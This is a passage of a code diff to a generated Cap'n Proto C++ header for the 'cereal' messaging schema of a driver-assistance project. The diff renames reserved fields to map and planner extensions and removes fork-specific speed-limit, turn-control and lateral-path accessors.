- inline bool isLiveMapData() const; - inline bool hasLiveMapData() const; - inline ::cereal::LiveMapData::Reader getLiveMapData() const; - private: ::capnp::_::StructReader _reader; template @@ -19960,29 +19613,29 @@ public: inline void adoptUiPlan(::capnp::Orphan< ::cereal::UiPlan>&& value); inline ::capnp::Orphan< ::cereal::UiPlan> disownUiPlan(); - inline bool isCustomReserved0(); - inline bool hasCustomReserved0(); - inline ::cereal::CustomReserved0::Builder getCustomReserved0(); - inline void setCustomReserved0( ::cereal::CustomReserved0::Reader value); - inline ::cereal::CustomReserved0::Builder initCustomReserved0(); - inline void adoptCustomReserved0(::capnp::Orphan< ::cereal::CustomReserved0>&& value); - inline ::capnp::Orphan< ::cereal::CustomReserved0> disownCustomReserved0(); + inline bool isLiveMapData(); + inline bool hasLiveMapData(); + inline ::cereal::LiveMapData::Builder getLiveMapData(); + inline void setLiveMapData( ::cereal::LiveMapData::Reader value); + inline ::cereal::LiveMapData::Builder initLiveMapData(); + inline void adoptLiveMapData(::capnp::Orphan< ::cereal::LiveMapData>&& value); + inline ::capnp::Orphan< ::cereal::LiveMapData> disownLiveMapData(); - inline bool isCustomReserved1(); - inline bool hasCustomReserved1(); - inline ::cereal::CustomReserved1::Builder getCustomReserved1(); - inline void setCustomReserved1( ::cereal::CustomReserved1::Reader value); - inline ::cereal::CustomReserved1::Builder initCustomReserved1(); - inline void adoptCustomReserved1(::capnp::Orphan< ::cereal::CustomReserved1>&& value); - inline ::capnp::Orphan< ::cereal::CustomReserved1> disownCustomReserved1(); + inline bool isLongitudinalPlanExt(); + inline bool hasLongitudinalPlanExt(); + inline ::cereal::LongitudinalPlanExt::Builder getLongitudinalPlanExt(); + inline void setLongitudinalPlanExt( ::cereal::LongitudinalPlanExt::Reader value); + inline ::cereal::LongitudinalPlanExt::Builder initLongitudinalPlanExt(); + inline void adoptLongitudinalPlanExt(::capnp::Orphan< ::cereal::LongitudinalPlanExt>&& value); + inline ::capnp::Orphan< ::cereal::LongitudinalPlanExt> disownLongitudinalPlanExt(); - inline bool isCustomReserved2(); - inline bool hasCustomReserved2(); - inline ::cereal::CustomReserved2::Builder getCustomReserved2(); - inline void setCustomReserved2( ::cereal::CustomReserved2::Reader value); - inline ::cereal::CustomReserved2::Builder initCustomReserved2(); - inline void adoptCustomReserved2(::capnp::Orphan< ::cereal::CustomReserved2>&& value); - inline ::capnp::Orphan< ::cereal::CustomReserved2> disownCustomReserved2(); + inline bool isLateralPlanExt(); + inline bool hasLateralPlanExt(); + inline ::cereal::LateralPlanExt::Builder getLateralPlanExt(); + inline void setLateralPlanExt( ::cereal::LateralPlanExt::Reader value); + inline ::cereal::LateralPlanExt::Builder initLateralPlanExt(); + inline void adoptLateralPlanExt(::capnp::Orphan< ::cereal::LateralPlanExt>&& value); + inline ::capnp::Orphan< ::cereal::LateralPlanExt> disownLateralPlanExt(); inline bool isCustomReserved3(); inline bool hasCustomReserved3(); @@ -20088,22 +19741,6 @@ public: inline void adoptLivestreamDriverEncodeData(::capnp::Orphan< ::cereal::EncodeData>&& value); inline ::capnp::Orphan< ::cereal::EncodeData> disownLivestreamDriverEncodeData(); - inline bool isDragonConf(); - inline bool hasDragonConf(); - inline ::cereal::DragonConf::Builder getDragonConf(); - inline void setDragonConf( ::cereal::DragonConf::Reader value); - inline ::cereal::DragonConf::Builder initDragonConf(); - inline void adoptDragonConf(::capnp::Orphan< ::cereal::DragonConf>&& value); - inline ::capnp::Orphan< ::cereal::DragonConf> disownDragonConf(); - - inline bool isLiveMapData(); - inline bool hasLiveMapData(); - inline ::cereal::LiveMapData::Builder getLiveMapData(); - inline void setLiveMapData( ::cereal::LiveMapData::Reader value); - inline ::cereal::LiveMapData::Builder initLiveMapData(); - inline void adoptLiveMapData(::capnp::Orphan< ::cereal::LiveMapData>&& value); - inline ::capnp::Orphan< ::cereal::LiveMapData> disownLiveMapData(); - private: ::capnp::_::StructBuilder _builder; template @@ -25719,20 +25356,6 @@ inline void PandaState::Builder::setSbu2Voltage(float value) { ::capnp::bounded<17>() * ::capnp::ELEMENTS, value); } -inline bool PandaState::Reader::getTorqueInterceptorDetected() const { - return _reader.getDataField( - ::capnp::bounded<481>() * ::capnp::ELEMENTS); -} - -inline bool PandaState::Builder::getTorqueInterceptorDetected() { - return _builder.getDataField( - ::capnp::bounded<481>() * ::capnp::ELEMENTS); -} -inline void PandaState::Builder::setTorqueInterceptorDetected(bool value) { - _builder.setDataField( - ::capnp::bounded<481>() * ::capnp::ELEMENTS, value); -} - inline bool PandaState::PandaCanState::Reader::getBusOff() const { return _reader.getDataField( ::capnp::bounded<0>() * ::capnp::ELEMENTS); @@ -28127,20 +27750,6 @@ inline void ControlsState::Builder::setExperimentalMode(bool value) { ::capnp::bounded<715>() * ::capnp::ELEMENTS, value); } -inline bool ControlsState::Reader::getDpLateralAltActive() const { - return _reader.getDataField( - ::capnp::bounded<716>() * ::capnp::ELEMENTS); -} - -inline bool ControlsState::Builder::getDpLateralAltActive() { - return _builder.getDataField( - ::capnp::bounded<716>() * ::capnp::ELEMENTS); -} -inline void ControlsState::Builder::setDpLateralAltActive(bool value) { - _builder.setDataField( - ::capnp::bounded<716>() * ::capnp::ELEMENTS, value); -} - inline bool ControlsState::LateralINDIState::Reader::getActive() const { return _reader.getDataField( ::capnp::bounded<0>() * ::capnp::ELEMENTS); @@ -29084,55 +28693,55 @@ inline ::capnp::Orphan< ::cereal::ControlsState::LateralPIDState> ControlsState: ::capnp::bounded<5>() * ::capnp::POINTERS)); } -inline bool ControlsState::LateralControlState::Reader::isLqrState() const { - return which() == ControlsState::LateralControlState::LQR_STATE; +inline bool ControlsState::LateralControlState::Reader::isLqrStateDEPRECATED() const { + return which() == ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D; } -inline bool ControlsState::LateralControlState::Builder::isLqrState() { - return which() == ControlsState::LateralControlState::LQR_STATE; +inline bool ControlsState::LateralControlState::Builder::isLqrStateDEPRECATED() { + return which() == ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D; } -inline bool ControlsState::LateralControlState::Reader::hasLqrState() const { - if (which() != ControlsState::LateralControlState::LQR_STATE) return false; +inline bool ControlsState::LateralControlState::Reader::hasLqrStateDEPRECATED() const { + if (which() != ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D) return false; return !_reader.getPointerField( ::capnp::bounded<5>() * ::capnp::POINTERS).isNull(); } -inline bool ControlsState::LateralControlState::Builder::hasLqrState() { - if (which() != ControlsState::LateralControlState::LQR_STATE) return false; +inline bool ControlsState::LateralControlState::Builder::hasLqrStateDEPRECATED() { + if (which() != ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D) return false; return !_builder.getPointerField( ::capnp::bounded<5>() * ::capnp::POINTERS).isNull(); } -inline ::cereal::ControlsState::LateralLQRState::Reader ControlsState::LateralControlState::Reader::getLqrState() const { - KJ_IREQUIRE((which() == ControlsState::LateralControlState::LQR_STATE), +inline ::cereal::ControlsState::LateralLQRState::Reader ControlsState::LateralControlState::Reader::getLqrStateDEPRECATED() const { + KJ_IREQUIRE((which() == ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D), "Must check which() before get()ing a union member."); return ::capnp::_::PointerHelpers< ::cereal::ControlsState::LateralLQRState>::get(_reader.getPointerField( ::capnp::bounded<5>() * ::capnp::POINTERS)); } -inline ::cereal::ControlsState::LateralLQRState::Builder ControlsState::LateralControlState::Builder::getLqrState() { - KJ_IREQUIRE((which() == ControlsState::LateralControlState::LQR_STATE), +inline ::cereal::ControlsState::LateralLQRState::Builder ControlsState::LateralControlState::Builder::getLqrStateDEPRECATED() { + KJ_IREQUIRE((which() == ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D), "Must check which() before get()ing a union member."); return ::capnp::_::PointerHelpers< ::cereal::ControlsState::LateralLQRState>::get(_builder.getPointerField( ::capnp::bounded<5>() * ::capnp::POINTERS)); } -inline void ControlsState::LateralControlState::Builder::setLqrState( ::cereal::ControlsState::LateralLQRState::Reader value) { +inline void ControlsState::LateralControlState::Builder::setLqrStateDEPRECATED( ::cereal::ControlsState::LateralLQRState::Reader value) { _builder.setDataField( - ::capnp::bounded<71>() * ::capnp::ELEMENTS, ControlsState::LateralControlState::LQR_STATE); + ::capnp::bounded<71>() * ::capnp::ELEMENTS, ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D); ::capnp::_::PointerHelpers< ::cereal::ControlsState::LateralLQRState>::set(_builder.getPointerField( ::capnp::bounded<5>() * ::capnp::POINTERS), value); } -inline ::cereal::ControlsState::LateralLQRState::Builder ControlsState::LateralControlState::Builder::initLqrState() { +inline ::cereal::ControlsState::LateralLQRState::Builder ControlsState::LateralControlState::Builder::initLqrStateDEPRECATED() { _builder.setDataField( - ::capnp::bounded<71>() * ::capnp::ELEMENTS, ControlsState::LateralControlState::LQR_STATE); + ::capnp::bounded<71>() * ::capnp::ELEMENTS, ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D); return ::capnp::_::PointerHelpers< ::cereal::ControlsState::LateralLQRState>::init(_builder.getPointerField( ::capnp::bounded<5>() * ::capnp::POINTERS)); } -inline void ControlsState::LateralControlState::Builder::adoptLqrState( +inline void ControlsState::LateralControlState::Builder::adoptLqrStateDEPRECATED( ::capnp::Orphan< ::cereal::ControlsState::LateralLQRState>&& value) { _builder.setDataField( - ::capnp::bounded<71>() * ::capnp::ELEMENTS, ControlsState::LateralControlState::LQR_STATE); + ::capnp::bounded<71>() * ::capnp::ELEMENTS, ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D); ::capnp::_::PointerHelpers< ::cereal::ControlsState::LateralLQRState>::adopt(_builder.getPointerField( ::capnp::bounded<5>() * ::capnp::POINTERS), kj::mv(value)); } -inline ::capnp::Orphan< ::cereal::ControlsState::LateralLQRState> ControlsState::LateralControlState::Builder::disownLqrState() { - KJ_IREQUIRE((which() == ControlsState::LateralControlState::LQR_STATE), +inline ::capnp::Orphan< ::cereal::ControlsState::LateralLQRState> ControlsState::LateralControlState::Builder::disownLqrStateDEPRECATED() { + KJ_IREQUIRE((which() == ControlsState::LateralControlState::LQR_STATE_D_E_P_R_E_C_A_T_E_D), "Must check which() before get()ing a union member."); return ::capnp::_::PointerHelpers< ::cereal::ControlsState::LateralLQRState>::disown(_builder.getPointerField( ::capnp::bounded<5>() * ::capnp::POINTERS)); @@ -30303,6 +29912,20 @@ inline void ModelDataV2::Builder::setConfidence( ::cereal::ModelDataV2::Confiden ::capnp::bounded<17>() * ::capnp::ELEMENTS, value); } +inline ::uint64_t ModelDataV2::Reader::getLocationMonoTime() const { + return _reader.getDataField< ::uint64_t>( + ::capnp::bounded<5>() * ::capnp::ELEMENTS); +} + +inline ::uint64_t ModelDataV2::Builder::getLocationMonoTime() { + return _builder.getDataField< ::uint64_t>( + ::capnp::bounded<5>() * ::capnp::ELEMENTS); +} +inline void ModelDataV2::Builder::setLocationMonoTime( ::uint64_t value) { + _builder.setDataField< ::uint64_t>( + ::capnp::bounded<5>() * ::capnp::ELEMENTS, value); +} + inline float ModelDataV2::LeadDataV2::Reader::getProb() const { return _reader.getDataField( ::capnp::bounded<0>() * ::capnp::ELEMENTS); @@ -32317,240 +31940,6 @@ inline void LongitudinalPlan::Builder::setPersonality( ::cereal::LongitudinalPer ::capnp::bounded<40>() * ::capnp::ELEMENTS, value); } -inline ::cereal::LongitudinalPlan::VisionTurnControllerState LongitudinalPlan::Reader::getVisionTurnControllerState() const { - return _reader.getDataField< ::cereal::LongitudinalPlan::VisionTurnControllerState>( - ::capnp::bounded<41>() * ::capnp::ELEMENTS); -} - -inline ::cereal::LongitudinalPlan::VisionTurnControllerState LongitudinalPlan::Builder::getVisionTurnControllerState() { - return _builder.getDataField< ::cereal::LongitudinalPlan::VisionTurnControllerState>( - ::capnp::bounded<41>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setVisionTurnControllerState( ::cereal::LongitudinalPlan::VisionTurnControllerState value) { - _builder.setDataField< ::cereal::LongitudinalPlan::VisionTurnControllerState>( - ::capnp::bounded<41>() * ::capnp::ELEMENTS, value); -} - -inline float LongitudinalPlan::Reader::getVisionTurnSpeed() const { - return _reader.getDataField( - ::capnp::bounded<21>() * ::capnp::ELEMENTS); -} - -inline float LongitudinalPlan::Builder::getVisionTurnSpeed() { - return _builder.getDataField( - ::capnp::bounded<21>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setVisionTurnSpeed(float value) { - _builder.setDataField( - ::capnp::bounded<21>() * ::capnp::ELEMENTS, value); -} - -inline ::cereal::LongitudinalPlan::SpeedLimitControlState LongitudinalPlan::Reader::getSpeedLimitControlState() const { - return _reader.getDataField< ::cereal::LongitudinalPlan::SpeedLimitControlState>( - ::capnp::bounded<44>() * ::capnp::ELEMENTS); -} - -inline ::cereal::LongitudinalPlan::SpeedLimitControlState LongitudinalPlan::Builder::getSpeedLimitControlState() { - return _builder.getDataField< ::cereal::LongitudinalPlan::SpeedLimitControlState>( - ::capnp::bounded<44>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setSpeedLimitControlState( ::cereal::LongitudinalPlan::SpeedLimitControlState value) { - _builder.setDataField< ::cereal::LongitudinalPlan::SpeedLimitControlState>( - ::capnp::bounded<44>() * ::capnp::ELEMENTS, value); -} - -inline float LongitudinalPlan::Reader::getSpeedLimit() const { - return _reader.getDataField( - ::capnp::bounded<23>() * ::capnp::ELEMENTS); -} - -inline float LongitudinalPlan::Builder::getSpeedLimit() { - return _builder.getDataField( - ::capnp::bounded<23>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setSpeedLimit(float value) { - _builder.setDataField( - ::capnp::bounded<23>() * ::capnp::ELEMENTS, value); -} - -inline float LongitudinalPlan::Reader::getSpeedLimitOffset() const { - return _reader.getDataField( - ::capnp::bounded<24>() * ::capnp::ELEMENTS); -} - -inline float LongitudinalPlan::Builder::getSpeedLimitOffset() { - return _builder.getDataField( - ::capnp::bounded<24>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setSpeedLimitOffset(float value) { - _builder.setDataField( - ::capnp::bounded<24>() * ::capnp::ELEMENTS, value); -} - -inline float LongitudinalPlan::Reader::getDistToSpeedLimit() const { - return _reader.getDataField( - ::capnp::bounded<25>() * ::capnp::ELEMENTS); -} - -inline float LongitudinalPlan::Builder::getDistToSpeedLimit() { - return _builder.getDataField( - ::capnp::bounded<25>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setDistToSpeedLimit(float value) { - _builder.setDataField( - ::capnp::bounded<25>() * ::capnp::ELEMENTS, value); -} - -inline bool LongitudinalPlan::Reader::getIsMapSpeedLimit() const { - return _reader.getDataField( - ::capnp::bounded<12>() * ::capnp::ELEMENTS); -} - -inline bool LongitudinalPlan::Builder::getIsMapSpeedLimit() { - return _builder.getDataField( - ::capnp::bounded<12>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setIsMapSpeedLimit(bool value) { - _builder.setDataField( - ::capnp::bounded<12>() * ::capnp::ELEMENTS, value); -} - -inline bool LongitudinalPlan::Reader::getSpeedLimitPercOffset() const { - return _reader.getDataField( - ::capnp::bounded<13>() * ::capnp::ELEMENTS); -} - -inline bool LongitudinalPlan::Builder::getSpeedLimitPercOffset() { - return _builder.getDataField( - ::capnp::bounded<13>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setSpeedLimitPercOffset(bool value) { - _builder.setDataField( - ::capnp::bounded<13>() * ::capnp::ELEMENTS, value); -} - -inline float LongitudinalPlan::Reader::getSpeedLimitValueOffset() const { - return _reader.getDataField( - ::capnp::bounded<26>() * ::capnp::ELEMENTS); -} - -inline float LongitudinalPlan::Builder::getSpeedLimitValueOffset() { - return _builder.getDataField( - ::capnp::bounded<26>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setSpeedLimitValueOffset(float value) { - _builder.setDataField( - ::capnp::bounded<26>() * ::capnp::ELEMENTS, value); -} - -inline float LongitudinalPlan::Reader::getDistToTurn() const { - return _reader.getDataField( - ::capnp::bounded<27>() * ::capnp::ELEMENTS); -} - -inline float LongitudinalPlan::Builder::getDistToTurn() { - return _builder.getDataField( - ::capnp::bounded<27>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setDistToTurn(float value) { - _builder.setDataField( - ::capnp::bounded<27>() * ::capnp::ELEMENTS, value); -} - -inline float LongitudinalPlan::Reader::getTurnSpeed() const { - return _reader.getDataField( - ::capnp::bounded<28>() * ::capnp::ELEMENTS); -} - -inline float LongitudinalPlan::Builder::getTurnSpeed() { - return _builder.getDataField( - ::capnp::bounded<28>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setTurnSpeed(float value) { - _builder.setDataField( - ::capnp::bounded<28>() * ::capnp::ELEMENTS, value); -} - -inline ::cereal::LongitudinalPlan::SpeedLimitControlState LongitudinalPlan::Reader::getTurnSpeedControlState() const { - return _reader.getDataField< ::cereal::LongitudinalPlan::SpeedLimitControlState>( - ::capnp::bounded<45>() * ::capnp::ELEMENTS); -} - -inline ::cereal::LongitudinalPlan::SpeedLimitControlState LongitudinalPlan::Builder::getTurnSpeedControlState() { - return _builder.getDataField< ::cereal::LongitudinalPlan::SpeedLimitControlState>( - ::capnp::bounded<45>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setTurnSpeedControlState( ::cereal::LongitudinalPlan::SpeedLimitControlState value) { - _builder.setDataField< ::cereal::LongitudinalPlan::SpeedLimitControlState>( - ::capnp::bounded<45>() * ::capnp::ELEMENTS, value); -} - -inline ::int16_t LongitudinalPlan::Reader::getTurnSign() const { - return _reader.getDataField< ::int16_t>( - ::capnp::bounded<58>() * ::capnp::ELEMENTS); -} - -inline ::int16_t LongitudinalPlan::Builder::getTurnSign() { - return _builder.getDataField< ::int16_t>( - ::capnp::bounded<58>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setTurnSign( ::int16_t value) { - _builder.setDataField< ::int16_t>( - ::capnp::bounded<58>() * ::capnp::ELEMENTS, value); -} - -inline bool LongitudinalPlan::Reader::getDpE2EIsBlended() const { - return _reader.getDataField( - ::capnp::bounded<14>() * ::capnp::ELEMENTS); -} - -inline bool LongitudinalPlan::Builder::getDpE2EIsBlended() { - return _builder.getDataField( - ::capnp::bounded<14>() * ::capnp::ELEMENTS); -} -inline void LongitudinalPlan::Builder::setDpE2EIsBlended(bool value) { - _builder.setDataField( - ::capnp::bounded<14>() * ::capnp::ELEMENTS, value); -} - -inline bool LongitudinalPlan::Reader::hasDistances() const { - return !_reader.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS).isNull(); -} -inline bool LongitudinalPlan::Builder::hasDistances() { - return !_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::List::Reader LongitudinalPlan::Reader::getDistances() const { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_reader.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS)); -} -inline ::capnp::List::Builder LongitudinalPlan::Builder::getDistances() { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS)); -} -inline void LongitudinalPlan::Builder::setDistances( ::capnp::List::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS), value); -} -inline void LongitudinalPlan::Builder::setDistances(::kj::ArrayPtr value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS), value); -} -inline ::capnp::List::Builder LongitudinalPlan::Builder::initDistances(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::List>::init(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS), size); -} -inline void LongitudinalPlan::Builder::adoptDistances( - ::capnp::Orphan< ::capnp::List>&& value) { - ::capnp::_::PointerHelpers< ::capnp::List>::adopt(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::List> LongitudinalPlan::Builder::disownDistances() { - return ::capnp::_::PointerHelpers< ::capnp::List>::disown(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS)); -} - inline bool LongitudinalPlan::GpsTrajectory::Reader::hasX() const { return !_reader.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); @@ -33411,82 +32800,6 @@ inline ::capnp::Orphan< ::cereal::LateralPlan::SolverState> LateralPlan::Builder ::capnp::bounded<8>() * ::capnp::POINTERS)); } -inline bool LateralPlan::Reader::hasDPathWLinesX() const { - return !_reader.getPointerField( - ::capnp::bounded<9>() * ::capnp::POINTERS).isNull(); -} -inline bool LateralPlan::Builder::hasDPathWLinesX() { - return !_builder.getPointerField( - ::capnp::bounded<9>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::List::Reader LateralPlan::Reader::getDPathWLinesX() const { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_reader.getPointerField( - ::capnp::bounded<9>() * ::capnp::POINTERS)); -} -inline ::capnp::List::Builder LateralPlan::Builder::getDPathWLinesX() { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_builder.getPointerField( - ::capnp::bounded<9>() * ::capnp::POINTERS)); -} -inline void LateralPlan::Builder::setDPathWLinesX( ::capnp::List::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<9>() * ::capnp::POINTERS), value); -} -inline void LateralPlan::Builder::setDPathWLinesX(::kj::ArrayPtr value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<9>() * ::capnp::POINTERS), value); -} -inline ::capnp::List::Builder LateralPlan::Builder::initDPathWLinesX(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::List>::init(_builder.getPointerField( - ::capnp::bounded<9>() * ::capnp::POINTERS), size); -} -inline void LateralPlan::Builder::adoptDPathWLinesX( - ::capnp::Orphan< ::capnp::List>&& value) { - ::capnp::_::PointerHelpers< ::capnp::List>::adopt(_builder.getPointerField( - ::capnp::bounded<9>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::List> LateralPlan::Builder::disownDPathWLinesX() { - return ::capnp::_::PointerHelpers< ::capnp::List>::disown(_builder.getPointerField( - ::capnp::bounded<9>() * ::capnp::POINTERS)); -} - -inline bool LateralPlan::Reader::hasDPathWLinesY() const { - return !_reader.getPointerField( - ::capnp::bounded<10>() * ::capnp::POINTERS).isNull(); -} -inline bool LateralPlan::Builder::hasDPathWLinesY() { - return !_builder.getPointerField( - ::capnp::bounded<10>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::List::Reader LateralPlan::Reader::getDPathWLinesY() const { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_reader.getPointerField( - ::capnp::bounded<10>() * ::capnp::POINTERS)); -} -inline ::capnp::List::Builder LateralPlan::Builder::getDPathWLinesY() { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_builder.getPointerField( - ::capnp::bounded<10>() * ::capnp::POINTERS)); -} -inline void LateralPlan::Builder::setDPathWLinesY( ::capnp::List::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<10>() * ::capnp::POINTERS), value); -} -inline void LateralPlan::Builder::setDPathWLinesY(::kj::ArrayPtr value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<10>() * ::capnp::POINTERS), value); -} -inline ::capnp::List::Builder LateralPlan::Builder::initDPathWLinesY(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::List>::init(_builder.getPointerField( - ::capnp::bounded<10>() * ::capnp::POINTERS), size); -} -inline void LateralPlan::Builder::adoptDPathWLinesY( - ::capnp::Orphan< ::capnp::List>&& value) { - ::capnp::_::PointerHelpers< ::capnp::List>::adopt(_builder.getPointerField( - ::capnp::bounded<10>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::List> LateralPlan::Builder::disownDPathWLinesY() { - return ::capnp::_::PointerHelpers< ::capnp::List>::disown(_builder.getPointerField( - ::capnp::bounded<10>() * ::capnp::POINTERS)); -} - inline bool LateralPlan::SolverState::Reader::hasX() const { return !_reader.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); @@ -44626,378 +43939,6 @@ inline ::capnp::Orphan< ::capnp::List> CameraO ::capnp::bounded<7>() * ::capnp::POINTERS)); } -inline bool LiveMapData::Reader::getSpeedLimitValid() const { - return _reader.getDataField( - ::capnp::bounded<0>() * ::capnp::ELEMENTS); -} - -inline bool LiveMapData::Builder::getSpeedLimitValid() { - return _builder.getDataField( - ::capnp::bounded<0>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setSpeedLimitValid(bool value) { - _builder.setDataField( - ::capnp::bounded<0>() * ::capnp::ELEMENTS, value); -} - -inline float LiveMapData::Reader::getSpeedLimit() const { - return _reader.getDataField( - ::capnp::bounded<1>() * ::capnp::ELEMENTS); -} - -inline float LiveMapData::Builder::getSpeedLimit() { - return _builder.getDataField( - ::capnp::bounded<1>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setSpeedLimit(float value) { - _builder.setDataField( - ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); -} - -inline bool LiveMapData::Reader::getSpeedLimitAheadValid() const { - return _reader.getDataField( - ::capnp::bounded<1>() * ::capnp::ELEMENTS); -} - -inline bool LiveMapData::Builder::getSpeedLimitAheadValid() { - return _builder.getDataField( - ::capnp::bounded<1>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setSpeedLimitAheadValid(bool value) { - _builder.setDataField( - ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); -} - -inline float LiveMapData::Reader::getSpeedLimitAhead() const { - return _reader.getDataField( - ::capnp::bounded<2>() * ::capnp::ELEMENTS); -} - -inline float LiveMapData::Builder::getSpeedLimitAhead() { - return _builder.getDataField( - ::capnp::bounded<2>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setSpeedLimitAhead(float value) { - _builder.setDataField( - ::capnp::bounded<2>() * ::capnp::ELEMENTS, value); -} - -inline float LiveMapData::Reader::getSpeedLimitAheadDistance() const { - return _reader.getDataField( - ::capnp::bounded<3>() * ::capnp::ELEMENTS); -} - -inline float LiveMapData::Builder::getSpeedLimitAheadDistance() { - return _builder.getDataField( - ::capnp::bounded<3>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setSpeedLimitAheadDistance(float value) { - _builder.setDataField( - ::capnp::bounded<3>() * ::capnp::ELEMENTS, value); -} - -inline bool LiveMapData::Reader::getTurnSpeedLimitValid() const { - return _reader.getDataField( - ::capnp::bounded<2>() * ::capnp::ELEMENTS); -} - -inline bool LiveMapData::Builder::getTurnSpeedLimitValid() { - return _builder.getDataField( - ::capnp::bounded<2>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setTurnSpeedLimitValid(bool value) { - _builder.setDataField( - ::capnp::bounded<2>() * ::capnp::ELEMENTS, value); -} - -inline float LiveMapData::Reader::getTurnSpeedLimit() const { - return _reader.getDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS); -} - -inline float LiveMapData::Builder::getTurnSpeedLimit() { - return _builder.getDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setTurnSpeedLimit(float value) { - _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, value); -} - -inline float LiveMapData::Reader::getTurnSpeedLimitEndDistance() const { - return _reader.getDataField( - ::capnp::bounded<5>() * ::capnp::ELEMENTS); -} - -inline float LiveMapData::Builder::getTurnSpeedLimitEndDistance() { - return _builder.getDataField( - ::capnp::bounded<5>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setTurnSpeedLimitEndDistance(float value) { - _builder.setDataField( - ::capnp::bounded<5>() * ::capnp::ELEMENTS, value); -} - -inline ::int16_t LiveMapData::Reader::getTurnSpeedLimitSign() const { - return _reader.getDataField< ::int16_t>( - ::capnp::bounded<1>() * ::capnp::ELEMENTS); -} - -inline ::int16_t LiveMapData::Builder::getTurnSpeedLimitSign() { - return _builder.getDataField< ::int16_t>( - ::capnp::bounded<1>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setTurnSpeedLimitSign( ::int16_t value) { - _builder.setDataField< ::int16_t>( - ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); -} - -inline bool LiveMapData::Reader::hasTurnSpeedLimitsAhead() const { - return !_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline bool LiveMapData::Builder::hasTurnSpeedLimitsAhead() { - return !_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::List::Reader LiveMapData::Reader::getTurnSpeedLimitsAhead() const { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline ::capnp::List::Builder LiveMapData::Builder::getTurnSpeedLimitsAhead() { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline void 